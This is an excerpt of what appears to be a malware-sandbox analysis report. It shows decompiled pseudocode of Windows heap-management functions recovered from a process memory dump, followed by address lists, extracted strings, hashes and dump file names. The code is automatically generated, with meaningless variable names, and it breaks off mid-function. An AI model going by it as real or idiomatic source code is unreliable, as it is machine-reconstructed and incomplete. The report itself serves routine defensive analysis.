																E04CF8F40(_a4 + _t772, 0, _t544 - _t772);
																_t844 = _t844 + 0xc;
																L140:
																_t544 = _a8;
															}
														}
														__eflags =  *(_t676 + 0x40) & 0x00000020;
														if(( *(_t676 + 0x40) & 0x00000020) != 0) {
															 *((intOrPtr*)(_t822 + _t544 + 8)) = 0xabababab;
															 *((intOrPtr*)(_t822 + _t544 + 0xc)) = 0xabababab;
														}
														__eflags = _t807 - _v80;
														if(_t807 != _v80) {
															_t297 = _t822 + 2; // 0xffec8b55
															_v164 =  *_t297 & 0x000000fe;
															__eflags =  *_v64 - 4;
															if( *_v64 != 4) {
																_t712 = ( *_t822 & 0x0000ffff) - (_t807 & 0x0000ffff);
																_v192 = ( *_t822 & 0x0000ffff) - (_t807 & 0x0000ffff);
																 *_t822 = _t807;
																_t774 =  *(_t676 + 0x40) & 0x00000040;
																_t331 = _t822 + 6; // 0x75ff1475
																_t551 =  *_t331;
																__eflags = _t551;
																if(_t551 == 0) {
																	_t552 = _t676;
																	_v44 = _t552;
																} else {
																	_v44 = _v44 - (_t551 & 0x000000ff);
																	_v44 = _v44 << 0x10;
																	_v44 = _v44 + (_t822 & 0xffff0000);
																	_t552 = _v44;
																}
																_v160 = _t552;
																_t774 = _t774 != 0;
																L04CB170C(_t676, _v44, _t822 + _t807 * 8, _v164, (_t552 & 0xffffff00 | _t774 != 0x00000000) & 0x000000ff, _t807, _t712);
															} else {
																_t826 = _t822 + 0xffffffe8;
																_t561 =  *( *[fs:0x30] + 0x68);
																_v188 = _t561;
																_t807 = _v60;
																__eflags = _t561 & 0x00000800;
																if((_t561 & 0x00000800) != 0) {
																	_t306 = _t826 + 0xa; // 0xc816d468
																	 *((short*)(_t826 + 0xa)) = E04D59AFE(_t676,  *_t306, _v56, _t807, 5);
																}
																_t714 = _v48;
																_v120 = _t826 + _t714;
																_v112 = (_v56 << 3) - _t714;
																_t567 = E04CAFABA( &_v120,  &_v112, 0x4000);
																_v156 = _t567;
																__eflags = _t567;
																if(_t567 >= 0) {
																	 *((intOrPtr*)(_t826 + 0x10)) =  *((intOrPtr*)(_t826 + 0x10)) - _v112;
																	_t822 = _v40;
																} else {
																	_t569 =  *[fs:0x30];
																	__eflags =  *(_t569 + 0xc);
																	if( *(_t569 + 0xc) == 0) {
																		_push("HEAP: ");
																		E04CAB910();
																	} else {
																		E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
																	}
																	_push(_v156);
																	_push(_v112);
																	E04CAB910("Unable to release memory at %p for %Ix bytes - Status == %x\n", _v120);
																	_t572 =  *[fs:0x30];
																	__eflags =  *((char*)(_t572 + 2));
																	if( *((char*)(_t572 + 2)) != 0) {
																		 *0x4da47a1 = 1;
																		 *0x4da4100 = 0;
																		asm("int3");
																		 *0x4da47a1 = 0;
																	}
																	_t822 = _v40;
																	_t807 = _v60;
																}
															}
														}
														__eflags =  *(_t822 + 7) - 4;
														if( *(_t822 + 7) != 4) {
															_t546 = _v48 - _a8;
															_v64 = _t546;
															__eflags = _t546 - 0x3f;
															if(_t546 >= 0x3f) {
																 *(_t822 + _t807 * 8 - 4) = _t546;
																 *(_t822 + 7) = 0x3f;
															} else {
																 *(_t822 + 7) = _t546;
															}
														}
													}
												} else {
													 *( *[fs:0x18] + 0xbf4) = 0xc000000d;
													_t829 =  *[fs:0x18];
													_v176 = _t829;
													 *((intOrPtr*)(_t829 + 0x34)) = E04CDABA0(0xc000000d);
												}
												_v8 = 1;
												goto L205;
											}
											_v140 = _t689;
											_t760 = _t689;
											goto L75;
										}
									}
									L205:
									_v8 = 0xfffffffe;
									E04CC35C9(_t676);
									_t495 =  *( *[fs:0x30] + 0x50);
									__eflags = _t495;
									if(_t495 == 0) {
										L208:
										_t496 = 0x7ffe0380;
									} else {
										__eflags =  *_t495;
										if( *_t495 == 0) {
											goto L208;
										} else {
											_t496 =  *( *[fs:0x30] + 0x50) + 0x226;
										}
									}
									__eflags =  *_t496;
									if( *_t496 == 0) {
										L214:
										_t823 = _a4;
									} else {
										_t498 =  *[fs:0x30];
										__eflags =  *(_t498 + 0x240) & 0x00000001;
										if(( *(_t498 + 0x240) & 0x00000001) == 0) {
											goto L214;
										} else {
											_t823 = _a4;
											__eflags = _t823;
											if(_t823 != 0) {
												__eflags = _v32 & 0x00800000;
												if((_v32 & 0x00800000) == 0) {
													E04D6F30A(_v76, _t823, _v136, _v52, _a8, 3);
												}
											}
										}
									}
									goto L215;
								} else {
									 *( *[fs:0x18] + 0xbf4) = 0xc0000017;
									 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E04CDABA0(0xc0000017);
									__eflags = 0;
									 *[fs:0x0] = _v20;
									return 0;
								}
							} else {
								__eflags = _t758 & 0x10000000;
								if(__eflags != 0) {
									goto L49;
								} else {
									_t640 = E04D5FDF4(_t676, _t804, _t758, _t804, _t822, __eflags, _a4, _a8);
									 *[fs:0x0] = _v20;
									return _t640;
								}
							}
						} else {
							E04D75FED(9, _t804, _t686, 0, 0, 0);
							__eflags = 0;
							 *[fs:0x0] = _v20;
							return 0;
						}
					} else {
						__eflags =  *(_t804 + 0xe4);
						if( *(_t804 + 0xe4) == 0) {
							goto L44;
						} else {
							__eflags =  *((char*)(_t686 + 7));
							if( *((char*)(_t686 + 7)) >= 0) {
								goto L44;
							} else {
								__eflags = _t756 & 0x00000010;
								if((_t756 & 0x00000010) != 0) {
									goto L2;
								} else {
									_t837 = _t686 >> 3;
									_t794 =  *_t686 ^ _t837 ^  *0x4da6964 ^ _t804;
									__eflags = _t794;
									if(_t794 == 0) {
										_t645 = _t686 - (_t794 >> 0xd);
										__eflags = _t645;
										_t646 =  *_t645;
									} else {
										_t646 = 0;
									}
									_t683 =  *(_t646 + 0x14) & 0x0000ffff;
									_t796 =  *((intOrPtr*)(_t686 + 7));
									__eflags = _t796 - 5;
									if(_t796 != 5) {
										__eflags = _t796 & 0x00000040;
										if((_t796 & 0x00000040) == 0) {
											__eflags = (_t796 & 0x0000003f) - 0x3f;
											if((_t796 & 0x0000003f) == 0x3f) {
												__eflags = _t796;
												if(_t796 >= 0) {
													__eflags =  *(_t804 + 0x4c);
													if( *(_t804 + 0x4c) == 0) {
														_t650 =  *_t686 & 0x0000ffff;
													} else {
														_t663 =  *_t686;
														__eflags =  *(_t804 + 0x4c) & _t663;
														if(( *(_t804 + 0x4c) & _t663) != 0) {
															_t663 = _t663 ^  *(_t804 + 0x50);
															__eflags = _t663;
														}
														_t650 = _t663 & 0x0000ffff;
													}
												} else {
													_t801 =  *_t686 ^ _t837 ^  *0x4da6964 ^ _t804;
													__eflags = _t801;
													if(_t801 == 0) {
														_t650 =  *((intOrPtr*)( *((intOrPtr*)(_t686 - (_t801 >> 0xd))) + 0x14));
													} else {
														_t650 =  *((intOrPtr*)(0x14));
													}
												}
												_t752 =  *(_t686 + (_t650 & 0xffff) * 8 - 4);
											} else {
												_t752 = _t796 & 0x3f;
											}
										} else {
											_t752 =  *(_t686 + 4 + (_t796 & 0x3f) * 8) & 0x0000ffff;
										}
									} else {
										_t752 =  *(_t686 + 4) & 0x0000ffff ^  *(_t804 + 0x54) & 0x0000ffff;
									}
									_t839 = _t683 * 8 - _t752;
									_v52 = _t839;
									_t818 = _v32 & 0xc003ffff;
									_v32 = _v32 & 0xc003ffff;
									_v8 = 0;
									_t684 = _a8;
									_t653 = E04CC5D90(_t752, _v76, _v32 & 0xc003ffff, _t684);
									_v72 = _t653;
									_v8 = 0xfffffffe;
									__eflags = _t653;
									if(_t653 == 0) {
										_t819 = _v76;
									} else {
										__eflags = _t684 - _t839;
										if(_t684 < _t839) {
											_t839 = _t684;
										}
										E04CF8C00(_t653, _a4, _t839);
										_t819 = _v76;
										E04CC3BC0(_v76, _t818, _a4);
									}
									_t655 =  *( *[fs:0x30] + 0x50);
									__eflags = _t655;
									if(_t655 == 0) {
										L37:
										_t656 = 0x7ffe0380;
									} else {
										__eflags =  *_t655;
										if( *_t655 == 0) {
											goto L37;
										} else {
											_t656 =  *( *[fs:0x30] + 0x50) + 0x226;
										}
									}
									__eflags =  *_t656;
									if( *_t656 == 0) {
										L43:
										_t823 = _v72;
									} else {
										_t657 =  *[fs:0x30];
										__eflags =  *(_t657 + 0x240) & 0x00000001;
										if(( *(_t657 + 0x240) & 0x00000001) == 0) {
											goto L43;
										} else {
											_t823 = _v72;
											__eflags = _t823;
											if(_t823 != 0) {
												__eflags = _v32 & 0x00800000;
												if((_v32 & 0x00800000) == 0) {
													E04D6F30A(_t819, _t823, _a4, _v52, _t684, 2);
												}
											}
										}
									}
									L215:
									 *[fs:0x0] = _v20;
									return _t823;
								}
							}
						}
					}
				} else {
					 *( *[fs:0x18] + 0xbf4) = 0;
					 *((intOrPtr*)( *[fs:0x18] + 0x34)) = E04CDABA0(0);
					L2:
					 *[fs:0x0] = _v20;
					return 0;
				}
			}

0x04cc28c0
0x04cc28c5
0x04cc28c7
0x04cc28cc
0x04cc28d7
0x04cc28d8
0x04cc28e1
0x04cc28e6
0x04cc28eb
0x04cc28ef
0x04cc28f5
0x04cc28f8
0x04cc28fb
0x04cc28fd
0x04cc2900
0x04cc2902
0x04cc2905
0x04cc290c
0x04cc2910
0x04cc291e
0x04cc295a
0x04cc295d
0x04cc295f
0x04cc2963
0x04cc296c
0x04cc296c
0x04cc296c
0x04cc296e
0x04cc2971
0x04cc2978
0x04cc2b4b
0x04cc2b4b
0x04cc2b4d
0x04cc2b7b
0x04cc2b7e
0x04cc2b81
0x04cc2b87
0x04cc2bb2
0x04cc2bb2
0x04cc2bb5
0x04cc2bba
0x04cc2bf6
0x04cc2bf8
0x04cc2bfa
0x04cc2bfc
0x04cc2bfc
0x04cc2c09
0x04cc2c0f
0x04cc2c12
0x04cc2c14
0x04cc2c14
0x04cc2c19
0x04cc2c1c
0x04cc2c23
0x04cc2c2a
0x04cc2c2e
0x04cc2cf7
0x00000000
0x04cc2c34
0x04cc2c34
0x04cc2c3a
0x04cc2c44
0x04cc2c49
0x04cc2c5d
0x04cc2c60
0x04cc2c87
0x04cc2c8e
0x04cc2c95
0x04cc2cd0
0x04cc2cda
0x04cc2cdf
0x04cc2ce4
0x04cc2ce9
0x04cc2ced
0x04cc2cf1
0x00000000
0x04cc2c97
0x04cc2c97
0x04cc2ca1
0x04cc2cab
0x04cc2cb2
0x04cc2cc2
0x04cc2cc2
0x04cc2c62
0x04cc2c62
0x04cc2c62
0x04cc2c62
0x00000000
0x04cc2c62
0x04cc2c4b
0x04cc2c4e
0x04cc2c51
0x04cc2c65
0x04cc2c65
0x04cc2c6c
0x04cc2c72
0x04cc2c79
0x04cc2c7d
0x04cc2c81
0x04cc2cfe
0x04cc2cfe
0x04cc2d05
0x04cc2d09
0x04cc2d12
0x04cc2d12
0x04cc2d12
0x04cc2d14
0x04cc2d16
0x04cc2d19
0x04cc2d1d
0x04cc2d22
0x04cc2d2c
0x04cc2d2f
0x04cc2d31
0x04cc2d36
0x04cc2d36
0x04cc2d2f
0x04cc2d3b
0x04cc2d3e
0x04cc2d41
0x04cc2d47
0x04cc2d47
0x04cc2d4a
0x04cc2d4c
0x00000000
0x00000000
0x04cc2d58
0x04cc2d5a
0x04cc2d5c
0x04cc353f
0x00000000
0x04cc2d62
0x04cc2d62
0x04cc2d65
0x04cc2d65
0x04cc2d6b
0x04cc2d6b
0x04cc2d6d
0x04cc2d8c
0x04cc2d8c
0x04cc2d6f
0x04cc2d6f
0x04cc2d71
0x00000000
0x04cc2d73
0x04cc2d73
0x04cc2d76
0x04cc2d7a
0x04cc2d7c
0x04cc2d7c
0x04cc2d7c
0x04cc2d84
0x04cc2d84
0x04cc2d71
0x04cc2d96
0x04cc2d9d
0x04cc2dae
0x04cc2dae
0x04cc2dae
0x04cc2dae
0x04cc2d9f
0x04cc2d9f
0x04cc2da6
0x00000000
0x04cc2da8
0x04cc2da8
0x04cc2dac
0x00000000
0x00000000
0x04cc2dac
0x04cc2da6
0x04cc2db2
0x04cc2db2
0x04cc2db5
0x04cc2db8
0x04cc2dba
0x04cc2dbd
0x04cc2dc3
0x04cc2df4
0x04cc2df7
0x04cc2e57
0x04cc2e5a
0x04cc2e5c
0x04cc2e5f
0x04cc2e62
0x04cc2e65
0x04cc2e76
0x04cc2e79
0x04cc2e8c
0x04cc2e8e
0x04cc2e90
0x04cc2e97
0x04cc2e99
0x04cc2ed2
0x04cc2ed6
0x04cc2efd
0x04cc2f00
0x04cc2ed8
0x04cc2ed8
0x04cc2eda
0x04cc2ee0
0x04cc2ee3
0x04cc2ee5
0x04cc2ee5
0x04cc2ee8
0x04cc2ee8
0x04cc2eee
0x04cc2ef2
0x04cc2ef5
0x04cc2ef8
0x04cc2ef8
0x04cc2f04
0x04cc2f07
0x04cc2e9b
0x04cc2ea8
0x04cc2eaa
0x04cc2ead
0x04cc2eb6
0x04cc2eb6
0x04cc2eb8
0x04cc2eaf
0x04cc2eaf
0x04cc2eaf
0x04cc2ebe
0x04cc2ec1
0x04cc2ec7
0x04cc2eca
0x04cc2ecd
0x04cc2ecd
0x04cc2f0d
0x04cc2f0d
0x04cc2e92
0x04cc2e92
0x04cc2e92
0x04cc2e7b
0x04cc2e81
0x04cc2e81
0x04cc2e67
0x04cc2e6f
0x04cc2e6f
0x04cc2f11
0x04cc2f1d
0x04cc2f27
0x04cc2f29
0x04cc2f33
0x04cc2f36
0x04cc2f43
0x04cc2f45
0x04cc2f47
0x04cc2f4a
0x04cc2f69
0x00000000
0x04cc2f4c
0x04cc2f52
0x04cc2f55
0x04cc2f58
0x04cc2f5b
0x04cc2f5e
0x04cc2f60
0x04cc2f60
0x04cc2f61
0x04cc2f61
0x04cc2f64
0x04cc2f64
0x04cc2f4a
0x04cc2df9
0x04cc2df9
0x04cc2df9
0x04cc2dfc
0x04cc2e00
0x04cc2e1b
0x04cc2e1e
0x04cc2e02
0x04cc2e02
0x04cc2e04
0x04cc2e07
0x04cc2e0a
0x04cc2e0c
0x04cc2e0c
0x04cc2e0f
0x04cc2e0f
0x04cc2e12
0x04cc2e16
0x04cc2e16
0x04cc2e28
0x04cc2e2a
0x04cc2e32
0x04cc2e35
0x04cc2e3b
0x04cc2e3e
0x04cc2e41
0x04cc2e44
0x04cc2e4f
0x04cc2f6c
0x04cc2f6c
0x04cc2f6c
0x04cc2f72
0x04cc2f75
0x04cc2f77
0x04cc2f7a
0x04cc2f7c
0x04cc3273
0x04cc3276
0x04cc328f
0x04cc328f
0x04cc3293
0x04cc32a4
0x04cc32aa
0x04cc32ad
0x04cc32ad
0x04cc32b0
0x04cc32b2
0x04cc32b4
0x04cc3331
0x04cc3334
0x04cc333a
0x04cc333d
0x04cc3342
0x04cc3344
0x04cc3344
0x04cc3347
0x04cc334a
0x04cc334c
0x04cc334e
0x04cc3357
0x04cc3357
0x04cc3359
0x04cc3359
0x04cc334c
0x04cc32b6
0x04cc32b6
0x04cc32bc
0x04cc32ce
0x04cc32d0
0x04cc32d3
0x04cc32da
0x04cc32dc
0x04cc32e1
0x04cc32e4
0x04cc32e8
0x04cc32eb
0x04cc32f2
0x04cc32f2
0x04cc32f4
0x04cc32f4
0x04cc32f7
0x04cc32f7
0x04cc335c
0x04cc335f
0x04cc3362
0x04cc3365
0x04cc3367
0x04cc336e
0x04cc3374
0x04cc3374
0x04cc3374
0x04cc3376
0x04cc337d
0x04cc338d
0x04cc3392
0x04cc3395
0x04cc33cc
0x04cc33ce
0x04cc3527
0x04cc33d4
0x04cc33d4
0x04cc33d4
0x04cc33d7
0x04cc33db
0x04cc33e4
0x04cc33e4
0x04cc33e4
0x04cc33e6
0x04cc33e8
0x04cc33eb
0x04cc33ee
0x04cc33f1
0x04cc33f6
0x04cc3400
0x04cc3403
0x04cc3405
0x04cc3408
0x04cc340a
0x04cc340f
0x04cc340f
0x04cc3403
0x04cc3412
0x04cc3415
0x04cc3419
0x04cc3421
0x04cc3426
0x04cc3429
0x04cc342c
0x04cc3431
0x04cc3433
0x04cc3436
0x04cc3439
0x04cc343b
0x04cc343e
0x04cc3440
0x04cc3445
0x04cc344a
0x04cc344a
0x04cc343e
0x04cc344d
0x04cc3454
0x04cc3458
0x04cc346f
0x04cc346f
0x04cc3471
0x04cc3473
0x04cc345a
0x04cc345c
0x04cc3461
0x04cc3467
0x04cc346a
0x04cc346a
0x04cc3476
0x04cc34af
0x04cc34b3
0x04cc34b5
0x04cc34b8
0x04cc34bd
0x04cc34c3
0x04cc34c3
0x04cc34c3
0x04cc34b3
0x04cc34c8
0x04cc34cb
0x04cc34d5
0x04cc34db
0x04cc34db
0x04cc34db
0x04cc34dd
0x04cc34e4
0x04cc34e8
0x04cc34ea
0x04cc34f0
0x04cc34f5
0x04cc34f9
0x04cc34f9
0x04cc34f9
0x04cc34f9
0x04cc34fd
0x04cc3500
0x04cc3503
0x04cc3505
0x04cc3505
0x04cc350d
0x04cc3511
0x04cc3520
0x04cc3520
0x04cc352d
0x04cc3533
0x04cc3295
0x04cc3295
0x04cc3295
0x04cc3278
0x04cc3282
0x04cc3287
0x04cc3289
0x00000000
0x00000000
0x04cc3289
0x04cc2f82
0x04cc2f82
0x04cc2f82
0x04cc2f85
0x04cc2f87
0x04cc2f89
0x04cc2f8b
0x04cc2f8e
0x04cc2f8e
0x04cc2f8e
0x04cc2f92
0x04cc2f92
0x04cc2f97
0x04cc2f9a
0x04cc2faa
0x04cc2fae
0x04cc3008
0x04cc300b
0x04cc3011
0x04cc3016
0x00000000
0x04cc3018
0x04cc3018
0x04cc301b
0x04cc301e
0x04cc3023
0x04cc3035
0x04cc303b
0x04cc303b
0x04cc2fb0
0x04cc2fb4
0x04cc2fb7
0x04cc2fbb
0x04cc2fbe
0x04cc2fc3
0x04cc2fc8
0x04cc2fd1
0x04cc2fd4
0x04cc2fda
0x04cc2fdf
0x04cc3040
0x04cc3043
0x04cc3046
0x04cc2fe1
0x04cc2fe1
0x04cc2fe6
0x04cc2fed
0x04cc2ffc
0x04cc2ffc
0x04cc3049
0x04cc3049
0x04cc2f9c
0x04cc2fa2
0x04cc2fa2
0x04cc304c
0x04cc304f
0x04cc3052
0x04cc3054
0x04cc3056
0x04cc305a
0x04cc3071
0x04cc3075
0x04cc307a
0x04cc307a
0x04cc307d
0x04cc3083
0x04cc308a
0x04cc308c
0x04cc308e
0x04cc3094
0x04cc3094
0x04cc3097
0x04cc309d
0x04cc309f
0x04cc30a2
0x04cc30a8
0x04cc30a8
0x04cc30ab
0x04cc30b3
0x04cc30b8
0x04cc30bb
0x04cc30bb
0x00000000
0x04cc30ab
0x04cc30a2
0x04cc305c
0x04cc3067
0x04cc306c
0x04cc30c0
0x04cc30c0
0x04cc30c0
0x04cc305a
0x04cc30c3
0x04cc30c7
0x04cc30c9
0x04cc30d1
0x04cc30d1
0x04cc30d9
0x04cc30dc
0x04cc30e2
0x04cc30e7
0x04cc30f0
0x04cc30f3
0x04cc31e8
0x04cc31ea
0x04cc31f0
0x04cc31f6
0x04cc31f9
0x04cc31f9
0x04cc31fc
0x04cc31fe
0x04cc3219
0x04cc321b
0x04cc3200
0x04cc3203
0x04cc3206
0x04cc3211
0x04cc3214
0x04cc3214
0x04cc321e
0x04cc3228
0x04cc323e
0x04cc30f9
0x04cc30f9
0x04cc3102
0x04cc3105
0x04cc310b
0x04cc310e
0x04cc3113
0x04cc311b
0x04cc3126
0x04cc3126
0x04cc312a
0x04cc3130
0x04cc313b
0x04cc314a
0x04cc314f
0x04cc3155
0x04cc3157
0x04cc31da
0x04cc31dd
0x04cc3159
0x04cc3159
0x04cc315f
0x04cc3163
0x04cc3184
0x04cc3189
0x04cc3165
0x04cc317a
0x04cc317f
0x04cc3191
0x04cc3197
0x04cc31a2
0x04cc31aa
0x04cc31b0
0x04cc31b4
0x04cc31b6
0x04cc31bd
0x04cc31c7
0x04cc31c8
0x04cc31c8
0x04cc31cf
0x04cc31d2
0x04cc31d2
0x04cc3157
0x04cc30f3
0x04cc3243
0x04cc3247
0x04cc3250
0x04cc3253
0x04cc3256
0x04cc3259
0x04cc3263
0x04cc3267
0x04cc325b
0x04cc325b
0x04cc325b
0x04cc3259
0x04cc3247
0x04cc2dc5
0x04cc2dcb
0x04cc2dd5
0x04cc2ddc
0x04cc2dec
0x04cc2dec
0x04cc3536
0x00000000
0x04cc3536
0x04cc2d4e
0x04cc2d54
0x00000000
0x04cc2d54
0x04cc2c49
0x04cc3598
0x04cc3598
0x04cc359f
0x04cc35aa
0x04cc35ad
0x04cc35af
0x04cc35f8
0x04cc35f8
0x04cc35b1
0x04cc35b1
0x04cc35b4
0x00000000
0x04cc35b6
0x04cc35bf
0x04cc35bf
0x04cc35b4
0x04cc35fd
0x04cc3600
0x04cc363b
0x04cc363b
0x04cc3602
0x04cc3602
0x04cc3608
0x04cc360f
0x00000000
0x04cc3611
0x04cc3611
0x04cc3614
0x04cc3616
0x04cc3618
0x04cc361f
0x04cc3634
0x04cc3634
0x04cc361f
0x04cc3616
0x04cc360f
0x00000000
0x04cc2bbc
0x04cc2bc2
0x04cc2bdd
0x04cc2be0
0x04cc2be5
0x04cc2bf3
0x04cc2bf3
0x04cc2b89
0x04cc2b89
0x04cc2b8f
0x00000000
0x04cc2b91
0x04cc2b99
0x04cc2ba1
0x04cc2baf
0x04cc2baf
0x04cc2b8f
0x04cc2b4f
0x04cc2b5d
0x04cc2b62
0x04cc2b67
0x04cc2b75
0x04cc2b75
0x04cc297e
0x04cc297e
0x04cc2985
0x00000000
0x04cc298b
0x04cc298b
0x04cc298f
0x00000000
0x04cc2995
0x04cc2995
0x04cc2998
0x00000000
0x04cc299a
0x04cc299c
0x04cc29a9
0x04cc29ab
0x04cc29ae
0x04cc29b9
0x04cc29b9
0x04cc29bb
0x04cc29b0
0x04cc29b0
0x04cc29b0
0x04cc29c1
0x04cc29c4
0x04cc29c7
0x04cc29ca
0x04cc29d8
0x04cc29db
0x04cc29ee
0x04cc29f0
0x04cc29fa
0x04cc29fc
0x04cc2a26
0x04cc2a2a
0x04cc2a3b
0x04cc2a2c
0x04cc2a2c
0x04cc2a2e
0x04cc2a31
0x04cc2a33
0x04cc2a33
0x04cc2a33
0x04cc2a36
0x04cc2a36
0x04cc29fe
0x04cc2a08
0x04cc2a0a
0x04cc2a0d
0x04cc2a20
0x04cc2a0f
0x04cc2a11
0x04cc2a11
0x04cc2a0d
0x04cc2a44
0x04cc29f2
0x04cc29f5
0x04cc29f5
0x04cc29dd
0x04cc29e3
0x04cc29e3
0x04cc29cc
0x04cc29d4
0x04cc29d4
0x04cc2a4f
0x04cc2a51
0x04cc2a57
0x04cc2a5d
0x04cc2a60
0x04cc2a67
0x04cc2a6f
0x04cc2a74
0x04cc2a77
0x04cc2ab1
0x04cc2ab3
0x04cc2ad6
0x04cc2ab5
0x04cc2ab5
0x04cc2ab7
0x04cc2ab9
0x04cc2ab9
0x04cc2ac1
0x04cc2acb
0x04cc2acf
0x04cc2acf
0x04cc2adf
0x04cc2ae2
0x04cc2ae4
0x04cc2afb
0x04cc2afb
0x04cc2ae6
0x04cc2ae6
0x04cc2ae9
0x00000000
0x04cc2aeb
0x04cc2af4
0x04cc2af4
0x04cc2ae9
0x04cc2b00
0x04cc2b03
0x04cc2b43
0x04cc2b43
0x04cc2b05
0x04cc2b05
0x04cc2b0b
0x04cc2b12
0x00000000
0x04cc2b14
0x04cc2b14
0x04cc2b17
0x04cc2b19
0x04cc2b1f
0x04cc2b26
0x04cc2b39
0x04cc2b39
0x04cc2b26
0x04cc2b19
0x04cc2b12
0x04cc363e
0x04cc3643
0x04cc3651
0x04cc3651
0x04cc2998
0x04cc298f
0x04cc2985
0x04cc2920
0x04cc2926
0x04cc293e
0x04cc2941
0x04cc2946
0x04cc2954
0x04cc2954

Strings

HEAP: , xrefs: 04CC3184
HEAP[%wZ]: , xrefs: 04CC3175
Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 04CC319D

Memory Dump Source

Source File: 00000004.00000002.5838791509.0000000004C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 04C80000, based on PE: true

Associated: 00000004.00000002.5838791509.0000000004DA9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000004.00000002.5838791509.0000000004DAD000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_4c80000_control.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: e9867e3bf96cfc3b4011c82a67f2f37c3fd5f037108fc51a87f5d3d503c66579
Instruction ID: bbf6031155ca563b1bd4c803c728a2c6430e7ff5cf446709d3de229e6b1ea02f
Opcode Fuzzy Hash: e9867e3bf96cfc3b4011c82a67f2f37c3fd5f037108fc51a87f5d3d503c66579
Instruction Fuzzy Hash: DE92AD71E042889FDB25CF69D4447ADBBF2FF48304F1880ADE856AB291D735AA41DF50

Uniqueness

Uniqueness Score: -1.00%

Function 04CC0680 Relevance: 4.2, Strings: 3, Instructions: 414
COMMONCrypto

Download Yara Rule

C-Code - Quality: 75%

			E04CC0680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E04CC0ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x4da6960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E04CAB910();
						} else {
							E04CAB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E04CAB910();
						__eflags =  *0x4da5da8;
						if(__eflags == 0) {
							E04D6FC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x4da6d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x4da91e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push(0x1c);
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = E04CF2BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E04D75FED(0, _t300, 1, _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x4da373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E04CF2B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E04D6EFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
